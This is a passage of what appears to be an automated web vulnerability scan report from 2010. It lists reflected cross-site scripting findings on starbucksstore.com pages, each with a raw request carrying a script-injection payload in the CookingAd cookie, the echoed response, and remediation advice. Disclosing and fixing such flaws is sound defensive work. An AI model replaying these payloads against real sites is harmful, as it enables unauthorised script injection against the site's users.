Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shourplg.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBd15c0</script><script>alert(1)</script>f0bd362f13;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25377
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:10 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... products/shourplg.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shourplg.asp" var s_prop3="SBPTPAHP1SHTBD15C0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>F0BD362F13" var s_prop4="" var s_prop5="" var s_prop6="/products/shourplg.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa301</script><script>alert(1)</script>0485f7d85aa was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shprodde.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfa301</script><script>alert(1)</script>0485f7d85aa;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:41:31 GMT
Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... ines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTBFA301</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0485F7D85AA" var s_prop4="" var s_prop5="" var s_prop6="/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 109e9</script><script>alert(1)</script>b870a4bcca was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shprodde.asp?SKU=309195 HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB109e9</script><script>alert(1)</script>b870a4bcca;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11887
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:42:26 GMT
Connection: close
<!--S1--><!--S0--> <html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... ageName="Detail Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Detail Page : 309195 : " var s_prop3="SBPTPAHP1SHTB109E9</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B870A4BCCA" var s_prop4="" var s_prop5="309195 : " var s_prop6="/products/shprodde.asp?SKU=309195" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9727f</script><script>alert(1)</script>9636677bff4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shprodli.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB9727f</script><script>alert(1)</script>9636677bff4;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14427
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:39:00 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... Name="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shprodli.asp" var s_prop3="SBPTPAHP1SHTB9727F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9636677BFF4" var s_prop4="" var s_prop5="" var s_prop6="/products/shprodli.asp" var s_prop7="" var s_prop8="" var s_prop9="Search Listing: Internal: " var s_prop10="" /* E-commerce Variables */
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 798a2</script><script>alert(1)</script>711801d72b9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/sitemap.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB798a2</script><script>alert(1)</script>711801d72b9;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21157 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:43:26 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... "/products/sitemap.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/sitemap.asp" var s_prop3="SBPTPAHP1SHTB798A2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>711801D72B9" var s_prop4="" var s_prop5="" var s_prop6="/products/sitemap.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_s ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d241</script><script>alert(1)</script>487db803af4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/terms.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2d241</script><script>alert(1)</script>487db803af4;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15962
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:42:01 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... ame="/products/terms.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/terms.asp" var s_prop3="SBPTPAHP1SHTB2D241</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>487DB803AF4" var s_prop4="" var s_prop5="" var s_prop6="/products/terms.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_sta ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fae82</script><script>alert(1)</script>675c202d2cd was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-office-coffee HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfae82</script><script>alert(1)</script>675c202d2cd;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20742
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:15 GMT
Connection: close
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Cont ...[SNIP]... ice HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Small Office HomePage" var s_prop3="SBPTPAHP1SHTBFAE82</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>675C202D2CD" var s_prop4="" var s_prop5="" var s_prop6="/small-office-coffee/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3e71</script><script>alert(1)</script>14d1501ca39 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-coffee-delivery HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBb3e71</script><script>alert(1)</script>14d1501ca39;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19580
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:16 GMT
Connection: close
<meta HTTP-EQUIV="Conten ...[SNIP]... at Home HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks at Home HomePage" var s_prop3="SBPTPAHP1SHTBB3E71</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>14D1501CA39" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-delivery/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_camp ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfd3e</script><script>alert(1)</script>0ff078f663a was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-coffee-delivery/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBbfd3e</script><script>alert(1)</script>0ff078f663a;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19580
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:04 GMT
Connection: close
<meta HTTP-EQUIV="Conten ...[SNIP]... at Home HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks at Home HomePage" var s_prop3="SBPTPAHP1SHTBBFD3E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0FF078F663A" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-delivery/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_camp ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d9d8</script><script>alert(1)</script>b1e2ceb23fc was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-coffee-tours/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1d9d8</script><script>alert(1)</script>b1e2ceb23fc;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16822
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:32 GMT
Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... e="Starbucks Tours Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Tours Page" var s_prop3="SBPTPAHP1SHTB1D9D8</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B1E2CEB23FC" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-tours/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaig ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f0a0</script><script>alert(1)</script>ba0159ff903 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-gift-cards HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2f0a0</script><script>alert(1)</script>ba0159ff903;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19751
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:19 GMT
Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... rbucks Card HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Card HomePage" var s_prop3="SBPTPAHP1SHTB2F0A0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>BA0159FF903" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-gift-cards/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign= ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9ad5</script><script>alert(1)</script>a10c039ee07 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-gifts HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf9ad5</script><script>alert(1)</script>a10c039ee07;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17245
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:01 GMT
Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... ame="Starbucks Gift Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Gift Page" var s_prop3="SBPTPAHP1SHTBF9AD5</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A10C039EE07" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-gifts/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab9e</script><script>alert(1)</script>091524f545b was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-gifts/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8ab9e</script><script>alert(1)</script>091524f545b;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17245
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:45 GMT
Connection: close
